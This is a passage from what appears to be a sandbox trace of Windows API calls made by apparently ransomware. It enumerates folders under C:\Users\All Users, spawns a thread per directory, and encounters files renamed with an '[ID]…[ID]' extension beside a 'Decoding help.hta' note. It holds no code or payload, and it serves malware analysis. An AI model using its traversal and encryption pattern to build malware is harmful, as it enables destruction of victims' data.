dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.000] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.000] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x1aa1fd30 | out: lpFindFileData=0x1aa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.001] FindClose (in: hFindFile=0x5e29b0 | out: hFindFile=0x5e29b0) returned 1 Thread: id = 413 os_tid = 0xa7c [0043.884] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*", lpFindFileData=0x1ab5fd30 | out: lpFindFileData=0x1ab5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e29f0 [0045.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.011] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x1ab5fd30 | out: lpFindFileData=0x1ab5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa93425b0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.011] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.011] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x1ab5fd30 | out: lpFindFileData=0x1ab5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0045.011] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0045.011] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0045.011] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0045.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" [0045.011] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned 91 [0045.011] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages" [0045.011] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\*.*" [0045.011] GlobalMemoryStatus (in: lpBuffer=0x1ab5fd10 | out: lpBuffer=0x1ab5fd10) [0045.011] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1131c2a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.024] CloseHandle (hObject=0x38c) returned 1 [0045.024] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x1ab5fd30 | out: lpFindFileData=0x1ab5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa9368710, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa9368710, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0045.024] FindClose (in: hFindFile=0x5e29f0 | out: hFindFile=0x5e29f0) returned 1 Thread: id = 414 os_tid = 0xb60 [0043.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*.*", lpFindFileData=0x1ac9fd30 | out: lpFindFileData=0x1ac9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a30 [0045.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.019] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1ac9fd30 | out: lpFindFileData=0x1ac9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.020] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.020] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.020] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1ac9fd30 | out: lpFindFileData=0x1ac9fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.020] FindClose (in: hFindFile=0x5e2a30 | out: hFindFile=0x5e2a30) returned 1 Thread: id = 415 os_tid = 0xb24 [0043.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x230bb750, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x230bb750, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a70 [0045.032] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.032] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x230bb750, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x230bb750, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.032] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.032] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.032] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x230231d0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x230231d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x23049330, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0045.032] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0045.032] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 79 [0045.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" [0045.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta")) returned 0x1 [0045.032] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0045.032] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x230bb750, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x8fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="STATER~1._ID")) returned 1 [0045.032] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0045.032] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 79 [0045.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" [0045.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta")) returned 0x1 [0045.033] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.033] lstrlenW (lpString="state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned 34 [0045.033] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.033] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x23cc86b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xbf438, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VC_RED~1._ID")) returned 1 [0045.033] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0045.033] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned 79 [0045.033] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" [0045.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\decoding help.hta")) returned 0x1 [0045.033] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0045.033] lstrlenW (lpString="VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned 42 [0045.033] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0045.033] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1addfd30 | out: lpFindFileData=0x1addfd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x23cc86b0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0xbf438, dwReserved0=0x0, dwReserved1=0x0, cFileName="VC_redist.x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="VC_RED~1._ID")) returned 0 [0045.033] FindClose (in: hFindFile=0x5e2a70 | out: hFindFile=0x5e2a70) returned 1 Thread: id = 416 os_tid = 0xb5c [0043.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*", lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2ab0 [0045.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.042] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.042] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.042] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0045.043] lstrcmpW (lpString1=".", lpString2="Definition Updates") returned -1 [0045.043] lstrcmpW (lpString1="..", lpString2="Definition Updates") returned -1 [0045.043] lstrcmpiW (lpString1="windows", lpString2="Definition Updates") returned 1 [0045.043] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0045.043] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 53 [0045.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Definition Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0045.043] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0045.043] GlobalMemoryStatus (in: lpBuffer=0x1af1fd10 | out: lpBuffer=0x1af1fd10) [0045.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99bad28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.058] CloseHandle (hObject=0x38c) returned 1 [0045.058] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0045.058] lstrcmpW (lpString1=".", lpString2="LocalCopy") returned -1 [0045.058] lstrcmpW (lpString1="..", lpString2="LocalCopy") returned -1 [0045.058] lstrcmpiW (lpString1="windows", lpString2="LocalCopy") returned 1 [0045.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0045.059] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 53 [0045.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="LocalCopy" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0045.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*" [0045.059] GlobalMemoryStatus (in: lpBuffer=0x1af1fd10 | out: lpBuffer=0x1af1fd10) [0045.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11334308, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.072] CloseHandle (hObject=0x38c) returned 1 [0045.072] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0045.072] lstrcmpW (lpString1=".", lpString2="Quarantine") returned -1 [0045.072] lstrcmpW (lpString1="..", lpString2="Quarantine") returned -1 [0045.072] lstrcmpiW (lpString1="windows", lpString2="Quarantine") returned 1 [0045.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0045.072] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 53 [0045.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Quarantine" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0045.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*" [0045.072] GlobalMemoryStatus (in: lpBuffer=0x1af1fd10 | out: lpBuffer=0x1af1fd10) [0045.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113ac510, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.095] CloseHandle (hObject=0x38c) returned 1 [0045.095] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scans", cAlternateFileName="")) returned 1 [0045.095] lstrcmpW (lpString1=".", lpString2="Scans") returned -1 [0045.095] lstrcmpW (lpString1="..", lpString2="Scans") returned -1 [0045.095] lstrcmpiW (lpString1="windows", lpString2="Scans") returned 1 [0045.095] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0045.095] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned 53 [0045.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Scans" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0045.095] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*" [0045.095] GlobalMemoryStatus (in: lpBuffer=0x1af1fd10 | out: lpBuffer=0x1af1fd10) [0045.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113643d8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0045.107] CloseHandle (hObject=0x38c) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x5e2ab0, lpFindFileData=0x1af1fd30 | out: lpFindFileData=0x1af1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x76792c22, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x76792c22, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Support", cAlternateFileName="")) returned 1 [0045.107] lstrcmpW (lpString1=".", lpString2="Support") returned -1 [0045.107] lstrcmpW (lpString1="..", lpString2="Support") returned -1 [0045.107] lstrcmpiW (lpString1="windows", lpString2="Support") returned 1 [0045.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0045.110] 